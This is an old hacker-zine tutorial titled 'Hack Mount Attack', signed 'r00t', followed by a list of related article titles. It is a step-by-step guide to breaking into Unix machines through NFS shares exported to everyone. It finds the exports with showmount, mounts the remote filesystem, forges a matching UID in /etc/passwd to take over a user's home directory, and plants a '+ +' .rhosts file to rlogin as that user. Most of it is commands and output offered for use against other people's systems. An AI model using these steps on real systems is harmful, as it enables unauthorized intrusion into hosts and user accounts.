Hack Mount Attack
->Gaining
access to unix systems (mount) <-
PLEASE
NOTE:I dont think the showmount command is included so if it doesnt work
then leave the command alone and move on to the next step!
YOU
NEED ROOT TO DO THIS (SO USE A ROOT ACCOUNT)
This
is not hard to do and there are many systems out there that are mountable.
Mount is a command in unix that will allow you to mount remote machines
drives to yours. This is done so you can do installs from other machines,
or just share drives or directories across the network. The problem is
that many admins are good with unix commands or setup. Or maybe they are
just plain lazy and mount the drives with world access not understanding
that the world can mount the drive and gain write access to their users
directories.
What you will need to get started here is a hacked root account. To be
able to mount the remote drive and gain access you will need to modify
the system's password file and use the su command.
Ok
let's say we have root access. let's get started!
You
can see if another system has mountable drives by using the showmount
command.
From
root account:
$root>
showmount -e wwa.com
mount
clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
Ok, no problem, this domain will not work, go on to the next one...
$root>
showmount -e seva.net
Export
list for seva.net:
/var/mail
pluto.seva.net
/home/user1
pluto.seva.net
/export/X11R6.3
rover.seva.net
/export/rover
rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat
(everyone)
/usr/local
pluto.seva.net,rover.seva.net
Notice
the (everyone), this would be good if we wanted to install linux from
this guy's box, but we want open directories to users.... so go on to
the next one...
$root>
showmount -e XXXXX.XXX < this one worked ... find your own ;)
Export
list for XXXXX.XXX: /export/home (everyone)
Now this guy mounted his home directory, the user accounts are off of
the home directory ;) and look above ... (everyone) can access it!
Ok,
this section was to show you how to see if they are mountable, in the
next section i will show you how to mount and hack it. But for now, here
is a script
that will scan for EVERY DOMAIN on the internet that is mountable and
log them for you.
To make it run in the background put a & after the command. like this:
cmount.pl&
How
it works: When you run the file it will go to the domains list and run
showmount -e on each domain, if it finds that there is a return on mountable
drives it will save the info in the current directory in files named:
domain.XXX.export. All you have to do is view the files and mount the
drives!
Ok,
now on to mounting the drives .... lets say we did a showmount -e domain.com
and got back:
Export list for domain.com:
/
everyone
/p1
everyone
/p2
everyone
/p3
everyone
/p4
everyone
/p5
everyone
/p6
everyone
/p7
everyone
/tmp
everyone
/var/spool/mail
titan/europa,galifrey
We
would want to mount / .. yup .... this guy has his entire system mountable!
$root>
mkdir /tmp/mount
$root>
mount -nt nfs domain.com:/ /tmp/mount
If he had the home directory mountable the command would be:
$root> mount -nt nfs domain.com:/home /tmp/mount
To
unmount the system, make sure you are out of the directory and type: $root>
umount /tmp/mount Make sure you make the mount directory first, you can
make this anywhere on the system that you want.
If
the systems /mnt directory is empty you can use it also.
Ok
this is for real: bash# ls -al /mnt ; making sure the mnt dir is empty
ls:
/mnt: No such file or directory ; there was not even a dir there ;)
bash#
mkdir /mnt ; lets make one for them *grin*
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker
...
bash#
cd /mnt ; changing to the mounted drive...
bash#
ls ; just the plain dir ..
TT_DB
home
raddb
share
back
local
radius-961029.gz
www
exec
lost+found
radius-961029.ps
bash#
; there is is up there, the home dir ... oh good ...
bash#
cd home
bash#
ls -l ; long directory listing ... tom is looking good here ;)
total
18
drwxr-xr-x 2
judy
other
512
Feb 1 10:41
garry
drwxr-xr-x
69
infobahn
other
5632
Mar 10 01:42
horke
drwxr-xr-x
11
301
other
2048
Mar 1 10:25
jens
drwxr-xr-x
2
300
other
512
Oct 15 07:45
joerg
drwxr-xr-x
2
604
other
512
Feb 8 13:00
mailadmin
drwxr-xr-x
2
melissa
other
512
Sep 27 06:15
mk
drwxr-xr-x
6
news
news
512
Mar 6 1996
news
drwxr-xr-x
4
jim
other
512
Sep 27 06:16
pauk
drwxr-xr-x
2
302
other
512
Mar 1 10:10
tom
drwxr-xr-x
5
601
daemon
512
Jan 26 1996
viewx
drwxr-xr-x
10
15
audio
512
Oct 17 08:03
www
drwxr-xr-x
2
303
other
512
Jan 24 04:17
norbert
bash#
; notice tom is user number 302 ... hmmm lets put him in our passwd
file
bash#
pico /etc/passwd tom:x:302:2::/home:/bin/bash ; this should do it ;)
bash#
su - tom ; su to the tom account ...
bash$
ls -l (total 18)
drwxr-xr-x
2
judy
other
512
Feb 1 10:41
garry
drwxr-xr-x
69
infobahn
other
5632
Mar 10 01:42
horke
drwxr-xr-x
11
301
other
2048
Mar 1 10:25
jens
drwxr-xr-x
2
300
other
512
Oct 15 07:45
joerg
drwxr-xr-x
2
604
other
512
Feb 8 13:00
mailadmin
drwxr-xr-x 2
melissa
other
512
Sep 27 06:15
mk
drwxr-xr-x
6
news
news
512
Mar 6 1996
news
drwxr-xr-x
4
jim
other
512
Sep 27 06:16
pauk
drwxr-xr-x
2
tom
other
512
Mar 1 10:10
tom
drwxr-xr-x
5
601
daemon
512
Jan 26 1996
viewx
drwxr-xr-x
10
15
audio
512
Oct 17 08:03
www
drwxr-xr-x
2 303
other
512
Jan 24 04:17
norbert
NOTICE
above that toms user number is gone ... we now own his dir!
bash$
echo + +>>tom/.rhosts ; this will make a file in his dir called .rhosts
bash$
;inside .rhosts will be wild cards + + for anyone to rlogin to his account
bash$
rlogin xxxxx.xxx we are tom on our machine, so lets just rlogin plain.
Last
login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx Sun Microsystems Inc.
SunOS 5.5 Generic November 1995 > ; yup we are in! And that's it. All
in a days work.
-
r00t
1.)
Setting
up mserver -
L33tdawg
2.)
Lockdown
: Securing your Linux box (part 2) -
L33tdawg
3.)
Distributed
Information Gathering -
hybrid
4.)
Aureate's
watching you... -
OB-1
5.)
MPAA's
Letter to 2600.org.au -
2600.org.au
6.)
Hackmount
attack -
r00t
